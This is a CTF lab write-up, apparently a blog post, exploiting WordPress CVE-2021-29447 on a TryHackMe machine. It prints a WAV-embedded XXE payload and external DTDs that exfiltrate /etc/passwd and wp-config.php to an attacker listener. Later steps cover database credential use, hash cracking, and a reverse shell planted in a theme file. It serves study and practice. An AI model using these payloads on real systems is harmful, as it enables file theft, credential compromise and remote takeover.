Post

TryHackMe - Wordpress CVE-2021-29447 (Linux)

TryHackMe Wordpress CVE-2021-29447 Linux マシン解説。実践的な悪用手順と権限昇格テクニックを解説。

Posted Updated
By Paul
4 min read
TryHackMe - Wordpress CVE-2021-29447 (Linux)

概要

項目 内容
OS Linux
難易度 記録なし
攻撃対象 記録なし
主な侵入経路 xxe, arbitrary-file-read, credential-harvest
権限昇格経路 Not implemented (no record)

偵察

1. PortScan

Rustscan

💡 なぜ有効か
High-quality reconnaissance narrows a large attack surface into a few validated exploitation paths. Accurate service mapping prevents time loss and supports targeted follow-up testing.

初期足がかり

Not implemented (not recorded in PDF)

Nmap

Not implemented (not recorded in PDF)

2. Local Shell

この検証は CVE-2021-29447(WordPressのメディア処理におけるXXE)を起点に、 wp-config.php からDB資格情報を回収し、最終的に管理画面経由でRCEを成立させる流れです。

2-1. WAV(iXML) に XXE ペイロードを埋め込む

1
2
3

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSERVERIP:9999/evil.dtd'"'"'>%remote;%init;%trick;]>' > payload.wav
cat payload.wav
RIFF�WAVEiXML{<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://10.18.55.118:9999/evil.dtd'>%remote;%init;%trick;]>

2-2. 外部DTDを用意してファイル読み取り

/etc/passwd を抜く場合:

1
2

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:9999/?p=%file;'>" >

wp-config.php を抜く場合:

1
2

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/html/wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:9999/?p=%file;'>" >

待受サーバ:

1

php -S 0.0.0.0:9999

WordPress のメディアアップロードから payload.wav を送信し、 待受側で返ってくるデータをデコードして wp-config.php のDB情報を取得します。

2-3. DBへ接続してユーザハッシュを取得

1
2
3
4
5
6
7
8
9

mysql -u thedarktangent -p -h 10.10.42.190
show databases;
use wordpressdb2;
show tables;
SELECT * FROM wptry_users;
SELECT ID, user_login, user_pass FROM wptry_users WHERE ID = 1;
Server version: 5.7.33-0ubuntu0.16.04.1 (Ubuntu)
Database: wordpressdb2
Extracted hash: $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1

2-4. ハッシュクラック

1
2

john wp-pass.hash --wordlist=~/thm/rockyou.txt
teddybear (?)

2-5. WordPress管理画面からRCE

  1. corp-001 / teddybear で WordPress 管理画面へログイン
  2. Appearance > Theme Editor を開く
  3. Twenty Nineteen テーマの 404.php にリバースシェルPHPを埋め込む
  4. 下記でトリガー
1

curl http://IP address/wp-content/themes/twentynineteen/404.php

補足: PDFメモでは https://reverse.7sec.pw で生成したリバースシェルコードを使用。

No record

💡 なぜ有効か
Initial access succeeds when enumeration findings are turned into a practical exploit chain. Capturing credentials, file disclosure, or direct RCE creates reliable pivot points for privilege escalation.

権限昇格

3.Privilege Escalation

PDF recordings do not include local privilege escalation steps, so they are not performed here. Next time you add, please add the confirmation log in the following order: sudo -l / SUID / cron / capabilities / writable script.

💡 なぜ有効か
Privilege escalation depends on chaining local weaknesses such as sudo misconfiguration, weak file permissions, or credential reuse. If a GTFOBins technique is used, the mechanism is that an allowed binary executes a child process or shell without dropping elevated effective privileges.

認証情報

1
2
3
4
5
6
7
8
9
10

MariaDB
- username: thedarktangent
- password: (wp-config.php に記載の値)

WordPress
- username: corp-001
- password: teddybear

Hash
- $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1

まとめ・学んだこと

4.Overview

flowchart LR
    subgraph SCAN["🔍 Scan"]
        direction TB
        S1["WordPress attack surface\nMedia upload path\n(no scan log in PDF)"]
    end

    subgraph INITIAL["💥 Initial Foothold"]
        direction TB
        I1["CVE-2021-29447 XXE\nWAV(iXML) + evil.dtd\nphp -S 0.0.0.0:9999"]
        I2["Read wp-config.php\nExtract DB creds\nmysql -u thedarktangent -p -h TARGET"]
        I3["Dump wptry_users hash\njohn wp-pass.hash --wordlist=...\ncorp-001:teddybear"]
        I4["Authenticated theme edit RCE\nInject reverse shell into 404.php\ncurl /wp-content/themes/.../404.php"]
    end

    subgraph PRIVESC["⬆️ Privilege Escalation"]
        direction TB
        P1["No privilege escalation log\nNeed post-exploitation enumeration"]
    end

    SCAN --> INITIAL --> PRIVESC

CVE Notes

  • CVE-2021-29447: Publicly tracked vulnerability referenced in this writeup; verify affected versions and exploit prerequisites before use.

参考文献

  • nmap
  • rustscan
  • john
  • sudo
  • curl
  • cat
  • base64
  • php
  • CVE-2021-29447
  • GTFOBins
TryHackMe, Linux
rce suid php privilege-escalation
This post is licensed under CC BY 4.0 by the author.